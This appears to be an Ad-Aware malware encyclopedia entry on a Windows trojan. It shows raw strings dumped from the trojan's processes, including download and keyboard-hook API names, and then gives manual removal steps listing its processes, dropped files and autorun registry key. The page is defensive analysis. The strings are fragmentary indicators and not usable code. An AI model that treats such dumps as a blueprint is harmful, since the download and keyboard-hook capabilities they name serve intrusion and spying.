Visual C   CRT: Not enough memory to complete call to strerror.
Broken pipe
Inappropriate I/O control operation
Operation not permitted
operator
GetProcessWindowStation
IS 5.0.2.4
Error %d in %s (%s)
Error %d in %s (%s) [%s]
C.o.p.y.r.i.g.h.t...2.0.1.0.
ISLib PNG Error : %s
1.2.22
ISLib JPG Error : %s
DIBToHBITMAP error: GetLastError = %d
read %d. layersLen %d
Reading PCD sub-image #%d (%d x %d)
.cals
Keywords
SetWinMetaFileBits failed GetLastError = %d
GeoKeyDirectory
%s: Invalid InkNames value; expecting %d names, found %d
%s: Bad value %u for "%s" tag
%s: Invalid %stag "%s" (not supported by codec)
%s: Bad field type %d for "%s"
%s: Failed to allocate space for list of custom values
%s: Bad value %d for "%s" tag
%s: Sorry, cannot nest SubIFDs
Nonstandard tile width %d, convert file
Nonstandard tile length %d, convert file
%s: Cannot modify tag "%s" while writing
%s: Unknown %stag %u
%s: Error fetching directory link
%s: Error fetching directory count
Sorry, can not handle images with %d-bit samples
Sorry, LogL data must have %s=%d
Sorry, can not handle LogLuv images with %s=%d
Sorry, LogLuv data must have %s=%d or %d
Sorry, can not handle image with %s=%d
Sorry, can not handle contiguous data with %s=%d, and %s=%d and Bits/Sample=%d
Sorry, can not handle RGB image with %s=%d
Sorry, can not handle contiguous data with %s=%d, and %s=%d
Sorry, can not handle separated image with %s=%d
Missing needed %s tag
No space %s
%s: Read error at scanline %lu, strip %lu; got %lu bytes, expected %lu
%s: Read error at scanline %lu; got %lu bytes, expected %lu
%s: Seek error at scanline %lu, strip %lu
%s: Read error at row %ld, col %ld, tile %ld; got %lu bytes, expected %lu
%s: Read error at row %ld, col %ld; got %lu bytes, expected %lu
%s: Seek error at row %ld, col %ld, tile %ld
%s: No space for data buffer at scanline %ld
%s: Data buffer too small to hold strip %lu
%s: Read error on strip %lu; got %lu bytes, expected %lu
%s: Invalid strip byte count %lu, strip %lu
%s: Data buffer too small to hold tile %ld
"%s": Bad mode
Not a TIFF file, bad version number %d (0x%x)
This is a BigTIFF file. This format not supported
Not a TIFF or MDI file, bad magic number %d (0x%x)
%s: Out of memory (TIFF structure)
Error writing data for field "%s"
%s: Error writing SubIFD directory link
M"%s": Information lost writing value (%g) as (unsigned) RATIONAL
Integer overflow in %s
LIBTIFF, Version 3.9.1
0123456789ABCDEFlibpng error: %s
libpng error: %s, offset=%d
libpng error no. %s: %s
libpng warning: %s
libpng warning no. %s: %s
1.2.3
NULL row buffer for row %ld, pass %d
iTXt chunk not supported.
Corrupt JPEG data: found marker 0xx instead of RST%d
Warning: unknown JFIF revision number %d.d
Corrupt JPEG data: %u extraneous bytes before marker 0xx
Inconsistent progression sequence for component %d coefficient %d
Unknown Adobe color transform code %d
Obtained XMS handle %u
Freed XMS handle %u
Unrecognized component IDs %d %d %d, assuming YCbCr
JFIF extension marker: RGB thumbnail image, length %u
JFIF extension marker: palette thumbnail image, length %u
JFIF extension marker: JPEG-compressed thumbnail image, length %u
Opened temporary file %s
Closed temporary file %s
Ss=%d, Se=%d, Ah=%d, Al=%d
Component %d: dc=%d ac=%d
Start Of Scan: %d components
Component %d: %dhx%dv q=%d
Start Of Frame 0xx: width=%u, height=%u, components=%d
Smoothing not supported with nonstandard sampling ratios
RST%d
At marker 0xx, recovery action %d
Selected %d colors for quantization
Quantizing to %d colors
Quantizing to %d = %d*%d*%d colors
%4u %4u %4u %4u %4u %4u %4u %4u
Unexpected marker 0xx
Miscellaneous marker 0xx, length %u
with %d x %d thumbnail image
JFIF extension marker: type 0xx, length %u
Warning: thumbnail image size does not match data length %u
JFIF APP0 marker: version %d.d, density %dx%d %d
= = = = = = = =
Obtained EMS handle %u
Freed EMS handle %u
Define Restart Interval %u
Define Quantization Table %d precision %d
Define Huffman Table 0xx
Define Arithmetic Table 0xx: 0xx
Unknown APP14 marker (not Adobe), length %u
Unknown APP0 marker (not JFIF), length %u
Adobe APP14 marker: version %d, flags 0xx 0xx, transform %d
Unsupported marker type 0xx
Failed to create temporary file %s
Unsupported JPEG process: SOF type 0xx
Cannot quantize to more than %d colors
Cannot quantize to fewer than %d colors
Cannot quantize more than %d color components
Insufficient memory (case %d)
Not a JPEG file: starts with 0xx 0xx
Quantization table 0xx was not defined
Huffman table 0xx was not defined
Backing store not supported
Cannot transcode due to multiple use of quantization table %d
Maximum supported image dimension is %u pixels
Empty JPEG image (DNL not supported)
Bogus DQT index %d
Bogus DHT index %d
Bogus DAC value 0x%x
Bogus DAC index %d
Unsupported color conversion request
Too many color components: %d, max %d
Buffer passed to JPEG library is too small
JPEG parameter struct mismatch: library thinks size is %u, caller expects %u
Improper call to JPEG library in state %d
Invalid scan script at entry %d
Invalid progressive parameters at scan script entry %d
Invalid progressive parameters Ss=%d Se=%d Ah=%d Al=%d
Unsupported JPEG data precision %d
Invalid memory pool code %d
Wrong JPEG library version: library is %d, caller expects %d
IDCT output block size %d not supported
Invalid component ID %d in SOS
Bogus message code %d
Found bad IPTC data resource (len exceeds block end). ID=%d
ExifInteroperabilityOffset
InteroperabilityVersion
InteroperabilityIndex
AsShotPreProfileMatrix
AsShotICCProfile
AsShotWhiteXY
AsShotNeutral
InteroperabilityIFDOffset
Internal error, unknown tag 0x%x
Tag %d
Compression algorithm does not support random access
Compression scheme %u %s encoding is not implemented
%s %s encoding is not implemented
Compression scheme %u %s decoding is not implemented
%s %s decoding is not implemented
%s: Cannot determine size of unknown tag type %d
%s: TIFF directory is missing required "%s" field
incorrect count for field "%s" (%u, expecting %u); tag trimmed
incorrect count for field "%s" (%u, expecting %u); tag ignored
%s: Can not read TIFF directory
%s: Can not read TIFF directory count
%s: Seek error accessing TIFF directory
Error fetching data for field "%s"
%s: Rational with zero denominator (num = %u)
unexpected count for field "%s", %u, expected 2; ignored
cannot read TIFF_ANY type %d for field "%s"
Cannot handle different per-sample values for field "%s"
%s: cannot handle zero strip size
%s: cannot handle zero tile size
%s: cannot handle zero scanline size
%s: Wrong "%s" field, ignoring and calculating from imagelength
%s: Bogus "%s" field, ignoring and calculating from imagelength
%s: TIFF directory is missing required "%s" field, calculating from imagelength
%s: cannot handle zero number of %s
%s: wrong data type %d for "%s"; tag ignored
Registering anonymous field with tag %d (0x%x) failed
%s: unknown field with tag %d (0x%x) encountered
%s: invalid TIFF directory; tags are not sorted in ascending order
%s: Failed to read directory at offset %u
Unknown zTXt compression type %d
Incomplete compressed datastream in %s chunk
Data error in compressed datastream in %s chunk
Buffer error in compressed datastream in %s chunk
gamma = (%d/100000)
gx=%f, gy=%f, bx=%f, by=%f
wx=%f, wy=%f, rx=%f, ry=%f
incorrect gamma=(%d/100000)
deflate 1.2.3 Copyright 1995-2003 Jean-loup Gailly
%ld%c
%s compression support is not configured
inflate 1.2.3 Copyright 1995-2005 Mark Adler
LogL16Decode: Not enough data at row %d (short %d pixels)
LogLuvDecode24: Not enough data at row %d (short %d pixels)
LogLuvDecode32: Not enough data at row %d (short %d pixels)
?%s: No space for SGILog translation buffer
No support for converting user data format to LogL
No support for converting user data format to LogLuv
Inappropriate photometric interpretation %d for SGILog compression; %s
SGILog compression supported only for %s, or raw data
Unknown data format %d for LogLuv compression
Unknown encoding %d for LogLuv compression
%s: No space for LogLuv state block
?PixarLog compression can't handle bits depth/data format combination (depth: %d)
%d bit input not supported in PixarLog
PixarLogDecode: unsupported bits/sample: %d
%s: stride %d is not a multiple of sample count, %d, data truncated.
%s: zlib error: %s
%s: Not enough data at scanline %d (short %d bytes)
%s: Decoding error at scanline %d, %s
PixarLog compression can't handle %d bit linear encodings
A%s: Encoder error: %s
%s: Bad code word at line %u of %s %u (x %u)
%s: Uncompressed data (not supported) at line %u of %s %u (x %u)
%s: %s at line %u of %s %u (got %u, expected %u)
%s: Premature EOF at line %u of %s %u (x %u)
%s: No space for Group 3/4 reference line
@ Fax DCS: %s
Fax SubAddress: %s
(%u = 0x%x)
%sEOL padding
%s2-d encoding
%suncompressed data
%s: No space for state block
JpegRestartInterval: %u
JpegProc: %u
OJPEG encoding not supported; use new-style JPEG compression instead
Unknown marker type %d in JPEG data
Subsampling values [%d,%d] are not allowed in TIFF
Subsampling inside JPEG data does not match subsampling tag values [%d,%d] (nor any other values allowed in TIFF); assuming subsampling inside JPEG data is correct and desubsampling inside JPEG decompression
Subsampling inside JPEG data [%d,%d] does not match subsampling tag values [%d,%d]; assuming subsampling inside JPEG data is correct
Subsampling tag is not set, yet subsampling inside JPEG data [%d,%d] does not match default values [2,2]; assuming subsampling inside JPEG data is correct
SamplesPerPixel %d not supported for this compression scheme
JPEG strip/tile size exceeds expected dimensions, expected %dx%d, got %dx%d
Decompressor will try reading with sampling %d,%d.
Improper JPEG sampling factors %d,%d
Apparently should be %d,%d.
Improper JPEG strip/tile size, expected %dx%d, got %dx%d
RowsPerStrip must be multiple of %d for JPEG
JPEG tile width must be multiple of %d
JPEG tile height must be multiple of %d
BitsPerSample %d not allowed for JPEG
PhotometricInterpretation %d not allowed for JPEG
ThunderDecode: %s data at scanline %ld (%lu != %lu)
LZWDecode: Bogus encoding, loop in the code table; scanline %d
LZWDecode: Not enough data at scanline %d (short %ld bytes)
LZWDecode: Wrong length of decoded string: data probably corrupted at scanline %d
LZWDecode: Corrupted LZW table at scanline %d
LZWDecode: Strip %d not terminated with EOI code
LZWDecodeCompat: Corrupted LZW table at scanline %d
LZWDecodeCompat: Wrong length of decoded string: data probably corrupted at scanline %d
LZWDecodeCompat: Not enough data at scanline %d (short %ld bytes)
DumpModeDecode: Not enough data for scanline %d
Horizontal differencing "Predictor" not supported with %d-bit samples
Floating point "Predictor" not supported with %d data format
"Predictor" value %d not supported
Out of memory allocating %d byte temp buffer.
%u (0x%x)
WindowsForms
NTDLL.DLL
COMCTL32.DLL
USER32.DLL
MSCTF.DLL
GDI32.DLL
SHLWAPI.DLL
UXTHEME.DLL
API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0.DLL
LEFTPRESSED
ALWAYSSHOWSIZINGBAR
MSGBOXFONT
%[^,], %ld, %s
User32.dll
msimg32.dll
windows-1254
windows-874
SUBLANG_PORTUGUESE_BRAZILIAN
Portuguese (Brazil)
SUBLANG_PORTUGUESE
LANG_PORTUGUESE
Portuguese (Portugal)
windows-1255
windows-1257
windows-1253
windows-1252
windows-1250
windows-1256
windows-1251
1.2.40
deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly
WININET.dll
?#%X.y
InternetCrackUrlA
InternetCanonicalizeUrlA
HttpQueryInfoA
HttpSendRequestA
HttpOpenRequestA
.?AVCCmdTarget@@
.PAVCException@@
.PAVCFileException@@
.PAVCMemoryException@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDPAVCISImageEx@@PAV3@@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDVCRect@@AAV3@@@
.?AVCMainWindowSettings@@
.?AVCMD5@@
.?AVCPasswordData@@
.?AVCRTSessionVarMgr@@
.?AVCScreenCrtrMeasure@@
.?AVCWebBrowser2@@
.PAVCInternetException@@
.PAVCResourceException@@
.?AVCScreenCtrlMsg@@
.?AVCScreenCtrlMsgDetail@@
.PAVCThreadException@IR@@
.PAVCObject@@
.PAVCOleException@@
.PAVCSimpleException@@
.PAVCNotSupportedException@@
.PAVCInvalidArgException@@
.?AVCNotSupportedException@@
.PAVCArchiveException@@
.PAVCUserException@@
.?AVCTestCmdUI@@
.?AVCCmdUI@@
.?AVCHttpConnection@@
.?AVCHttpFile@@
.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@
.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDV12@PBD@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDPAVCDocument@@PAV3@@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBD_N_N@@
.?AV?$CMap@PAVCDocument@@PAV1@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBD@@
.PAVCOleDispatchException@@
.?AVCMDITabProxyWnd@@
.?AVCMDIChildWndEx@@
.?AVCMDIChildWnd@@
.?AVCMDIFrameWndEx@@
.?AVCMDIFrameWnd@@
.?AVCMFCToolBarCmdUI@@
.?AVCMFCAcceleratorKey@@
.?AVCMFCColorBarCmdUI@@
.?AV?$CMap@KKV?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBD@@
.?AV?$CList@PAVCMDIChildWndEx@@PAV1@@@
.?AVCMDIClientAreaWnd@@
.?AVCMFCRibbonCmdUI@@
.?AVCMFCCmdUsageCount@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDPAVCObList@@PAV3@@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDHH@@
.?AVCMFCRibbonKeyTip@@
.?AVCMFCToolBarsKeyboardPropertyPage@@
.?AVCMFCTasksPaneToolBarCmdUI@@
.?AVCMFCAcceleratorKeyAssignCtrl@@
zcÁ
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\_ir_sf_temp_0\irsetup.exe
GetProcessHeap
GetCPInfo
GetWindowsDirectoryA
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
RegEnumKeyA
RegEnumKeyExA
RegQueryInfoKeyA
RegDeleteKeyA
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportOrgEx
GetViewportExtEx
GdiplusShutdown
ShellExecuteExA
ShellExecuteA
UrlUnescapeA
URLDownloadToFileA
MapVirtualKeyExA
GetKeyboardState
GetKeyboardLayout
MapVirtualKeyA
GetKeyNameTextA
SetWindowsHookExA
UnhookWindowsHookEx
CreateDialogIndirectParamA
GetKeyState
ExitWindowsEx
EnumWindows
MsgWaitForMultipleObjects
GetAsyncKeyState
|5#" " " 
# # #""%"$
^)1-"*"<.
2;%SK
%.Fh3>$]R
]<%XZ
WEBI
]>2?>2/"
H%FZW
|@@@@8>-
\ ,%X
[9<;.MK31?MM&
!3-%#;3&1
##0#3131%& 
.QICN,1#-#5<## @I3>##Jl;>C3I=I6lIC6&-4-350T-3]
$&%f#F>#
:0@033*00
$,0($,$4
(,,4,4,$
0488<<<( 0
.text
`.rdata
@.data
.rsrc
@.reloc
accKeyboardShortcut
hhctrl.ocx
VWININET.DLL
dwmapi.dll
xUxTheme.dll
yDWrite.dll
D2D1.dll
SHELL32.DLL
ZRICHED20.DLL
mscoree.dll
ekernel32.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
aero.msstyles
winxp.royale.cjstyles
royale.msstyles
winxp.luna.cjstyles
luna.msstyles
Argument %d must be of type %s.
%d arguments required.
All Files (*.*)
No error message is available.#Attempted an unsupported operation.$A required resource was unavailable.
Command failed.)Insufficient memory to perform operation.PSystem registry entries have been removed and the INI file (if any) was deleted.BNot all of the system registry entries (or INI file) were removed.FThis program requires the file %s, which was not found on this system.tThis program is linked to the missing export %s in the file %s. This machine may have an incompatible version of %s.
Destination disk drive is full.5Unable to read from %1, it is opened by someone else.AUnable to write to %1, it is read-only or opened by someone else.1Encountered an unexpected error while reading %1.1Encountered an unexpected error while writing %1.
#Unable to load mail system support.
Note that if you choose to recover the auto-saved documents, you must explicitly save them to overwrite the original documents. If you choose to not recover the auto-saved versions, they will be deleted.fRecover the auto-saved documents
%s [Recovered]

pumssx.exe_544:

.text
`.data
.rsrc
MSVBVM60.DLL
000000000
3333333
niuyywos.UserControl1
%Program Files% (x86)\Microsoft Visual Studio\VB98\VB6.OLB
EnumChildWindows
user32.dll
Kernel32.dll
VBA6.DLL
psapi.dll
REVE.exe

iexplore.exe_1484:

%?9-*09,*19}*09
.text
`.data
.rsrc
msvcrt.dll
KERNEL32.dll
NTDLL.DLL
USER32.dll
SHLWAPI.dll
SHDOCVW.dll
Software\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess
IE-X-X
rsabase.dll
System\CurrentControlSet\Control\Windows
dw15 -x -s %u
watson.microsoft.com
IEWatsonURL
%s -h %u
iedw.exe
Iexplore.XPExceptionFilter
jscript.DLL
mshtml.dll
mlang.dll
urlmon.dll
wininet.dll
shdocvw.DLL
browseui.DLL
comctl32.DLL
IEXPLORE.EXE
iexplore.pdb
ADVAPI32.dll
MsgWaitForMultipleObjects
IExplorer.EXE
IIIIIB(II<.Fg
7?_____ZZSSH%
)z.UUUUUUUU
,....Qym
````2```
{.QLQIIIKGKGKGKGKGKG
;33;33;0
8888880
8887080
browseui.dll
shdocvw.dll
6.00.2900.5512 (xpsp.080413-2105)
Windows
Operating System
6.00.2900.5512


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    HDplayer.exe:1052
    wmic.exe:1220
    pumssx.exe:544
    oo2.exe:1836
    %original file name%.exe:560

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Local Settings\Temp\oo2.exe (100548 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\oo2.zzz (19008 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsx5.tmp\frghw.dll (4119 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\81443793891.txt (238 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ui-bg_inset-hard_100_fcfdfd_1x100[1].png (88 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\jquery-ui.min[1].js (5827 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\DynamicOfferScreen[1].htm (1042 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\DynamicOfferScreen[2].htm (850 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ui-bg_gloss-wave_75_2191c0_500x100[1].png (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\dc[1].js (1327 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\DynamicOfferScreen[1].htm (2083 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\jquery.min[1].js (3621 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\jquery-ui[1].css (33 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\lua5.1.dll (1610 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.exe (7972 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %WinDir%\chromebrowser.exe (846182 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\HDplayer.exe (345689 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.dat (1209 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\IRIMG2.JPG (29 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\IRIMG1.JPG (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\pumssx.exe (20929 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "chromebrowser" = "%WinDir%\chromebrowser.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2026 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now